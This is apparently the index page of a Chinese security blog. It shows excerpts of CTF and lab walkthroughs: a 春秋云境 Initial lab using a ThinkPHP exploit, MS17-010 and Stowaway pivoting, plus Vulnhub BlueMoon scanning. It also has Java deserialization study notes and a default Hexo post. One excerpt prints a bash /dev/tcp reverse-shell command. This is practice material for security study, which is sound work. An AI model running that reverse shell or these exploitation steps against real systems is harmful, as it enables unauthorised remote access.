春秋云境-Initial
春秋云境-Initial1签到领的沙硕😋😋😋 首先打开分配的ip,是某一个管理系统 fscan扫一下,发现有漏洞,直接去打 使用Thinkphp直接打漏洞 sudo发现mysql具有s权限,不过在这个工具上面提不了权限(可以考虑反弹shell到服务器上面去弹然后提权),不过没必要,直接去读/root/flag/f*里面的flag 上传fscan去扫一下发现多个东西,可以看到内网有 172.22.1.18 信呼协同,还有 MS17-010 漏洞 1bash -c 'exec bash -i &>/dev/tcp/xx.xx.xx.xx/2333 <&1' 做一个内网通信,可以用 frp 也可以用 stowaway (https://github.com/ph4ntonn/Stowaway/releases/tag/v2.2) 先在服务器运行 admin 文件后,再在靶机上运行 agent 得到响应 找到对应 linux 靶机的 agent 传到靶机上,admin 传到自己服务器上 ...
java反序列化CC1链
java反序列化CC1链12参考:https://sun1028.top/2025/09/14/java%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96-cc1%e9%93%be/https://www.bilibili.com/video/BV1no4y1U7E1/?spm_id_from=333.1387.homepage.video_card.click&vd_source=a6499c8d882cb6d106922aae77725c31 简单介绍CC1 全称 Commons-Collections1,是利用了 Apache Commons 项目中的 Commons-Collections 库的一个反序列化漏洞 Apache Commons Collections 是一个扩展了 Java 标准库里的 Collection 结构的第三方基础库,它提供了很多强大的数据结构类型和实现了各种集合工具类。作为 Apache 开放项目的重要组件,Commons Collections 被广泛的各种 Java 应用的开发,⽽正 是因为在⼤量 web ...
java反序列化和序列化&URLDNS链
java反序列化和序列化&URLDNS链123参考https://github.com/bfengj/CTF/blob/main/Web/java/Java%E5%9F%BA%E7%A1%80/Java-%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0.mdhttps://sun1028.top/2025/09/14/java%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96urldns%e9%93%be/https://blog.csdn.net/mocas_wang/article/details/107621010 序列化与反序列化 Java序列化是指把Java对象转换为字节序列的过程;而Java反序列化是指把字节序列恢复为Java对象的过程。 序列化分为两大部分:序列化和反序列化。序列化是这个过程的第一部分,将数据分解成字节流,以便存储在文件中或在网络上传输。反序列化就...
113
113获取靶机地址:https://maze-sec.com/qq群:660930334 首先进行信息搜集 123456789101112131415 sudo nmap -sU -F 10.103.207.192 ░▒▓ ✔ zss@zss 04:01:26 下午 [sudo] zss 的密码:Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 16:01 CSTStats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing UDP ScanUDP Scan Timing: About 99.99% done; ETC: 16:03 (0:00:00 remaining)Stats: 0:01:36 elapsed; 0 hosts completed (1 up), 1 undergoing UDP ScanUDP Scan Timing: About 99.99% done; ETC: 16:03 (0:00:00 remaining)Nmap s...
Vulnhub-BlueMoon 2021
Vulnhub-BlueMoon: 2021地址 1https://download.vulnhub.com/bluemoon/bluemoon.ova 打开靶机,先进行扫描,发现 去访问,同时使用 1234nmap 10.103.207.184扫描端口dirsearch -u http://10.103.207.184/gobuster dir -u http://10.103.207.184/ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -s 200,301,302 --status-codes-blacklist ""feroxbuster -u http://10.103.207.184/ 扫描80端口下面的文件信息 去进行扫描 发现 1http://10.103.207.184/hidden_text 网站下面有给功能点 1http://10.103.207.184/.QR_C0d3.png 发现是二维码,当然是...
不知道写什么标题好的文章
不知道起什么标题好放了假看了点java打了几个linux的靶机,看java感觉好厉害,这就直接打出来漏洞了?,看他们打靶机感觉思路好牛逼啊这你给我提权了?,想到自己哎哎哎,不过想到开学要去打比赛以及突然想起来自己期末周的时候被拷打,不行!!!,那就自己稍微总结一下关于渗透的知识。关于渗透总感觉自己在qq群里面去打了,应该知道点,但似乎就是不知道了,打了也是白打,md,我和傻子一样 信息搜集虽然好像在打靶机的时候可能稍微用一点,不过自己在被拷打的时候确实是啥也而不知道,正好也稍微改一下,把一些面试时候的东西也总结一下 这里参考的是渗透安全HackTwo(微信公众号直接去搜就行,非常好的公众号) 首先是对域名进行搜集 1例如www.wea5e1.top --> 一级域名是我们的wea5e1.top,也就是主域名,而www则是二级域名 正常我们去拿到域名的时候,都要去一些网站去查查 123456789101112131415161718192021222324251:天眼查,看看有没有旁段啊什么的,比如blog.wea5e1.top,szlcm.wea5e1.top,lcmz...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment
